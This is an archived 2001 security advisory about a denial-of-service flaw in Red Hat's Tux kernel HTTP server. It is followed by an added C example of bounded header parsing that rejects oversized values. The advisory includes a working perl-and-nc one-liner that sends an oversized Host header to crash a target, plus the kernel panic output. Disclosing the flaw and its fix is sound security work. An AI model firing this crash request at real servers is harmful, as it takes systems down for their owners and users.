RH Linux Tux HTTPD DoS

From: Aiden ORawe (a.oraweat_private)
Date: Mon Nov 05 2001 - 04:57:15 PST

    TUX HTTPD Denial of Service Condition
    =====================================
    
    
    Background:
    -------------
    
    Tux is a Kernel-Space HTTP server coded for optimal performance (IRQ
    Affinity, HTTP compression, direct scatter-gather DMA etc.)  It is meant to
    be used as the main HTTP server for static objects with requests for dynamic
    content being passed to a user-space HTTPD server such as Apache on the same
    box when necessary. Tux is disabled by default.
    
    
    Vulnerability:
    --------------
    
    It is possible to cause a denial of service condition by submitting an
    oversized "Host:" header request to the Tux daemon causing an assertion
    failure and eventual Kernel Panic.  A total system reboot is required to
    return full functionality. For example the following script will cause the
    target box to crash:
    
    
    perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
    qq(\n)" |nc <ip address> <dest_port>
    
    
    The following output will then be generated (edited for brevity):
    
    
    Code: Bad EIP Value.
     (0)Kernel Panic: Aiee, killing interrupt handler!
    In interrupt handler - not syncing!
    
    
    To the best of my knowledge this is *not* a buffer overflow (despite
    apparently being able to overwrite the contents of the EIP register) and as
    such cannot be utilised to run arbitrary code.  FYI the Tux source code
    contains numerous assertions that are used to safeguard data integrity and
    if any of these assertions fail (as it does in this case) code execution is
    halted by making a call to the BUG() function.
    
    
    System(s) tested:
    -----------------
    
    RedHat Linux 7.2, Kernel 2.4.7-10 and 2.4.9-7 running TUX-2.1.0-2.
    
    
    Additional Notes:
    -----------------
    
    securityat_private were advised of this issue 25 October 2001.
    
    
    Solution:
    ---------
    
    See Security Advisory - RHSA-2001:142-15
    
    http://www.redhat.com/support/errata/RHSA-2001-142.html
    
    
    Thanks:
    -------
    
    Michael K. Johnston
    
    
    ============================================================================
    
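The crash reported above is an assertion firing on an over-length request header. As an added illustration (not Tux's code and not part of the advisory), the C program below shows the bounded parsing a server can do instead: a header value longer than a fixed limit is reported as a client error and the request can be dropped, rather than tripping an invariant check and taking the machine down. The limit MAX_HEADER_VALUE and every function name here are hypothetical; the 6000-byte Host line is constructed to match the shape of the request in the advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical limit for this example; real servers choose their own
 * (e.g. Apache's LimitRequestFieldSize defaults to 8190 bytes). */
#define MAX_HEADER_VALUE 4096

enum parse_result { HDR_OK = 0, HDR_TOO_LONG = -1, HDR_MALFORMED = -2 };

/* Copy the value of one "Name: value" line into out (capacity outlen).
 * Returns HDR_OK, HDR_TOO_LONG if the value exceeds MAX_HEADER_VALUE or
 * does not fit in out, or HDR_MALFORMED if there is no colon.
 * Nothing here asserts: an oversized request is a client error, not an
 * internal invariant violation, so it must not reach BUG()/abort(). */
int parse_header_value(const char *line, char *out, size_t outlen)
{
    const char *colon = strchr(line, ':');
    if (!colon)
        return HDR_MALFORMED;
    const char *v = colon + 1;
    while (*v == ' ' || *v == '\t')   /* skip optional leading whitespace */
        v++;
    size_t n = strcspn(v, "\r\n");    /* value ends at end of line */
    if (n > MAX_HEADER_VALUE || n >= outlen)
        return HDR_TOO_LONG;          /* reject before touching out */
    memcpy(out, v, n);
    out[n] = '\0';
    return HDR_OK;
}

/* Build a constructed "Host: AAAA...\n" line with `count` A's (heap
 * allocated; caller frees). Mirrors the shape of the advisory's request. */
char *make_host_line(size_t count)
{
    const char prefix[] = "Host: ";
    size_t plen = sizeof(prefix) - 1;
    char *buf = malloc(plen + count + 2);
    if (!buf)
        return NULL;
    memcpy(buf, prefix, plen);
    memset(buf + plen, 'A', count);
    buf[plen + count] = '\n';
    buf[plen + count + 1] = '\0';
    return buf;
}

/* 1 if a Host line of `count` A's is accepted by the bounded parser,
 * 0 if it is rejected (or could not be built). */
int host_line_accepted(size_t count)
{
    char value[MAX_HEADER_VALUE + 1];
    char *line = make_host_line(count);
    if (!line)
        return 0;
    int rc = parse_header_value(line, value, sizeof value);
    free(line);
    return rc == HDR_OK;
}

/* 1 if `line` parses cleanly and its value equals `expected`. */
int header_value_equals(const char *line, const char *expected)
{
    char out[MAX_HEADER_VALUE + 1];
    return parse_header_value(line, out, sizeof out) == HDR_OK
        && strcmp(out, expected) == 0;
}

int main(void)
{
    printf("Host: example.test -> %s\n",
           header_value_equals("Host: example.test\r\n", "example.test")
               ? "accepted" : "rejected");
    printf("Host: 12 x 'A'     -> %s\n",
           host_line_accepted(12) ? "accepted" : "rejected");
    printf("Host: 6000 x 'A'   -> %s\n",
           host_line_accepted(6000) ? "accepted" : "rejected");
    return 0;
}
```

The design point is where the limit check sits: length is validated against a fixed bound before the value is copied or used, and the failure is returned as an ordinary error code that the request loop can turn into a 4xx response or a closed connection. Assertions remain useful for genuine internal invariants, but input length is never one of them.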